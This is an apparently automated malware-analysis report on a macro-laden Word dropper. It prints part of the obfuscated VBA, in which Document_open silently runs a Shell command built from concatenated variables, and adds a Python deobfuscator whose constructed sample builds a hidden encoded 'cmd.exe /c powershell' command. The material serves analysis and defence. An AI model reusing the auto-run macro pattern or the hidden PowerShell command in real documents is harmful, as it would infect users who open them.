Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK:
- T1059 Command and Scripting Interpreter
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is detected as malicious by ClamAV (Doc.Dropper.Agent-6617066-0) and contains VBA macros. The critical heuristic is a Shell() call in the VBA code, which executes an external command; in droppers of this kind the command is commonly used to download and execute a further payload. Here the call sits in Document_open, so it fires as soon as the document is opened with macros enabled. Its command line is assembled at runtime from thirteen concatenated variables plus a CVar("C") literal, and the WindowStyle argument is 0 (vbHide), so the spawned process shows no window. None of those variables is assigned in the visible part of the macro, so the command itself cannot be recovered from this preview. The remaining procedures are padding: comparisons between variables that are never assigned anywhere in the visible code guard arithmetic that never runs, and On Error Resume Next suppresses any fault they might raise.
Heuristics (5)

| Heuristic | Severity | ID | Detail |
|---|---|---|---|
| ClamAV: Doc.Dropper.Agent-6617066-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Agent-6617066-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (2 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI that appears in virtually every Office document; it is not a download location or C2 indicator, and the heuristic is informational only.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44979 bytes | ebf976869c5631f906a42248d54b4782691fa035f75f40cd638e49e90b1f41b4 |
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "voDCrmvuuH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function itCfCjY()
On Error Resume Next
If VtTZPv > klIAkj Then
jdjSM = zjGvW * ZZCMFc
End If
If WNMDUa > lQwIM Then
MwlEh = fAPQq * sZkYww
End If
If fOKKkv > wJfji Then
jlBTuV = rlHLoD * NPnTZ
End If
If KXpQZ > iFUICc Then
NRiimC = CuGwW * VzjWLG
End If
If pqDRfR > zQiHpJ Then
JBvRi = MsHzWI * BXNRCN
End If
If nHbsOn > HVoVXv Then
okljBG = lmYCaV * hYCXE
End If
End Function
Private Function bzYPIcQYN()
On Error Resume Next
If LMGwoJ > MWjENO Then
zYLNS = iwuCAm * NMnPt
End If
If JiBkDQ > uaMOpt Then
XuChV = tJQDI * HOLMu
End If
If oskpWj > CTtQoV Then
JdolX = nQnBEI * uBJJw
End If
If oIslU > FNDZLK Then
wzzbn = RDYEjl * NuBJk
End If
If htRwOY > tXcLq Then
sHqzwb = NkzOz * CJhjNS
End If
End Function
Private Function amnPtQsXN()
On Error Resume Next
If GfLNQ > mUzafi Then
ARGSSh = pUPYzQ * lYpjX
End If
If oioWBz > hOhpVW Then
hhPlW = itvrTw * jrKtBn
End If
If lqpiG > dNJwU Then
LWqjiz = mVqinh * PZQrnH
End If
If dCwtd > mdJTFr Then
sDjKXW = ouICBJ * DwSIMp
End If
If BVBUj > NtVMoW Then
PksaTE = umzCE * LpEoo
End If
End Function
Private Function jYiJjSpuMRX()
On Error Resume Next
If HHquF > qXLAd Then
iBhidh = pPFdWR * iiRbz
End If
If jnPUJ > GiqPG Then
NwXzqw = pkzbj * fnEwM
End If
If timWG > jmQnOA Then
BwKtH = aZhhn * BQAZD
End If
If lArpDK > ITpTl Then
JKRsk = JAErM * wNEif
End If
If cGFctq > kdjTk Then
HwFbOO = XXcjLi * dTCmd
End If
If nwEAq > vYlwQ Then
BQwLTi = CtLtbz * tDPrj
End If
If ZRYvKG > djtDn Then
cDhiC = ahJcCc * cbrIt
End If
If iArOhJ > szLcF Then
zKwkZ = iADBd * duWMG
End If
End Function
Private Function vkCKSPAOTKj()
On Error Resume Next
If aqYMTX > RUnQLc Then
IRFbfQ = nuPHO * kpcnk
End If
If zSCRco > bHBvT Then
dDYtid = wiASs * olkVcf
End If
If KJXAAz > OSDvB Then
mAiRLw = bDoID * LiiasR
End If
If CDPOtT > RcjGIf Then
AfCwnv = GVPwA * pjrKid
End If
If CMzhKG > fNNBj Then
LcTQA = DnPSkZ * AYqlZQ
End If
If MtWWAv > LktQv Then
uhTQvp = ziwql * bJptCi
End If
If kmuEj > EVuiTN Then
XQYjz = jhnwJE * SObsz
End If
End Function
Private Sub Document_open()
On Error Resume Next
If ukZfSD > kiHhwB Then
dPMFQ = vGqoL * CcXXXT
End If
If XcWiYJ > Mdfvff Then
FWwoz = lLzNXo * wjXKi
End If
If TUwRWw > AcrjZ Then
MUTLFS = tMdIG * ujcFUN
End If
If KfIWA > fpHMI Then
cvTmN = cGLqLw * fIKZZQ
End If
If iBfbsX > FEOUK Then
SqJizU = FMUTLa * tVQiw
End If
VBA.Shell "" + jtjnPdIiW + iqFNsPza + CVar("C") + tlTfABMKjOYFk + jSBumcUMDE + pmnZZkj + fAzZdOYq + DrttzRK + mFHAv + ZPjMFP + bMaiCpDc + QwuPNEwK + toKVLZBGbrmJMR + ZwwjShMQRCJjn, 0
If INTQIo > OLnMS Then
rBCOh = FYuRb * jmoTo
End If
If cMVzV > iICEF Then
bYQIcU = JzjrfM * tDIPRS
End If
If KwrUf > unviM Then
ksAuhP = XYsVp * tibznn
End If
End Sub
Private Function MIzFFFdrzKnb()
On Error Resume Next
If czTjli > jphRPK Then
mfNRF = hbBUz * SMGVZk
End If
If bDKZwC > SJRwdn Then
UisoW = TihOMs * opprjG
End If
If pYcDP > BBCQh Then
FDSMK = rAVXfC * BvIfoQ
End If
If dzInN > LiLFjY Then
AaZmzu = CzRtaV * WtVOz
End If
If WPMDr > jpzzz Then
MBKcad = WzVvNE * rcUaM
End If
If jioQb > FuTNp Then
EKGJO = iUvjH * PCnzKn
End If
If kDrwpz > mHoiw Then
IFzGJG = CAwzh * LNcUIj
End If
End Function
Private Func
```
... (truncated)
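The Shell() argument above is the usual concatenation trick: the command is split into string fragments held in variables (often assigned in other procedures of the module) and glued together only at runtime, so a plain grep for `cmd` or `powershell` finds nothing. The following Python is an added example, not part of the analyzer's output or of the carved macro: a small static resolver that locates Shell() calls, notes whether the enclosing procedure is auto-executed, folds literals, Chr(n), CVar()/CStr() wrappers and variable references into the final command line, and decodes the WindowStyle argument. The VBA it runs on is constructed to mirror the structure of macros.bas (padding function, Document_open, VBA.Shell with a concatenated argument and WindowStyle 0); its fragments, variable names such as frag1, and the helper names analyze_vba, resolve and split_top_level are the example's own inventions, and the real macro's fragments are not visible in the truncated preview.

```python
import re

# Constructed sample (NOT the macro carved from this document). It mirrors the
# layout of macros.bas above -- padding function, auto-exec Document_open,
# VBA.Shell fed a concatenated string, WindowStyle 0 -- but every fragment is
# invented so that the command can actually be reassembled.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Function Pad1()
On Error Resume Next
If aaQz > bbQz Then
ccQz = ddQz * eeQz
End If
End Function
Private Sub Document_open()
On Error Resume Next
frag1 = "cm"
frag2 = "d.exe /c "
frag3 = Chr(112) & "ower" + "shell"
frag5 = "QQBBAEEA"
frag4 = " -w hidden -enc " + frag5
VBA.Shell "" + frag1 + frag2 + CVar(frag3) + frag4, 0
End Sub
'''

# Procedures Word/Excel run without user interaction once macros are enabled.
AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
            "document_open", "document_close", "document_new",
            "workbook_open", "workbook_close", "workbook_activate"}

# Shell() WindowStyle constants; 0 hides the spawned process entirely.
WINDOW_STYLES = {"0": "vbHide", "1": "vbNormalFocus", "2": "vbMinimizedFocus",
                 "3": "vbMaximizedFocus", "4": "vbNormalNoFocus",
                 "6": "vbMinimizedNoFocus"}

PROC_RE = re.compile(r"^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?"
                     r"(?:Sub|Function)\s+(\w+)", re.I)
END_PROC_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
# Matches "Shell ...", "Call Shell(...)", "VBA.Shell ..." and "x = Shell(...)".
SHELL_RE = re.compile(r"^\s*(?:Call\s+)?(?:\w+\s*=\s*)?(?:VBA\.|Interaction\.)?"
                      r"Shell\b\s*(.*?)\s*$", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
STRING_RE = re.compile(r'^"((?:[^"]|"")*)"$')
CHR_RE = re.compile(r"^Chr[WB]?\$?\(\s*(\d+)\s*\)$", re.I)
WRAP_RE = re.compile(r"^(?:CVar|CStr)\((.*)\)$", re.I)


def split_top_level(expr, separators):
    """Split expr on any char in separators, ignoring quoted text and parens."""
    parts, buf, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch in separators and depth == 0:
                parts.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    parts.append("".join(buf).strip())
    return parts


def resolve(expr, env, seen=frozenset()):
    """Statically fold a VBA string expression: literals, Chr(n), CVar()/CStr()
    wrappers, + / & concatenation and variables assigned anywhere in the module.
    Whatever cannot be folded is left as a <name?> placeholder."""
    expr = expr.strip()
    pieces = split_top_level(expr, "+&")
    if len(pieces) > 1:
        return "".join(resolve(p, env, seen) for p in pieces)
    if m := STRING_RE.match(expr):
        return m.group(1).replace('""', '"')  # "" inside a literal is one quote
    if m := CHR_RE.match(expr):
        return chr(int(m.group(1)))
    if m := WRAP_RE.match(expr):
        return resolve(m.group(1), env, seen)
    if re.fullmatch(r"[A-Za-z_]\w*", expr) and expr in env and expr not in seen:
        return resolve(env[expr], env, seen | {expr})  # seen guards cycles
    return f"<{expr}?>"


def analyze_vba(source):
    """One finding per Shell() call: enclosing procedure, whether it auto-runs,
    fragment count, reassembled command, window style and unresolved names."""
    lines = source.splitlines()
    # Pass 1: collect every assignment module-wide, since droppers frequently
    # set the fragments in helper procedures rather than next to the call.
    env = {}
    for line in lines:
        if (m := ASSIGN_RE.match(line)) and not SHELL_RE.match(line):
            env[m.group(1)] = m.group(2)
    # Pass 2: walk procedures and resolve each Shell() argument.
    findings, proc = [], None
    for line in lines:
        if m := PROC_RE.match(line):
            proc = m.group(1)
        elif END_PROC_RE.match(line):
            proc = None
        elif m := SHELL_RE.match(line):
            args = m.group(1)
            if args.startswith("(") and args.endswith(")"):
                args = args[1:-1]
            parts = split_top_level(args, ",")
            command = resolve(parts[0], env)
            style = parts[1] if len(parts) > 1 else "1"  # default vbNormalFocus
            findings.append({
                "procedure": proc,
                "autoexec": (proc or "").lower() in AUTOEXEC,
                "fragments": len(split_top_level(parts[0], "+&")),
                "command": command,
                "window_style": WINDOW_STYLES.get(style, style),
                "unresolved": re.findall(r"<(\w+)\?>", command),
            })
    return findings


if __name__ == "__main__":
    for f in analyze_vba(SAMPLE_VBA):
        print(f"{f['procedure']} autoexec={f['autoexec']} fragments={f['fragments']} "
              f"{f['window_style']}: {f['command']}")
```

Run against real olevba output the same way (`analyze_vba(open("macros.bas").read())`); a high fragment count on an auto-exec procedure is itself a strong signal even when some names stay unresolved, which is the situation this report's truncated preview leaves you in.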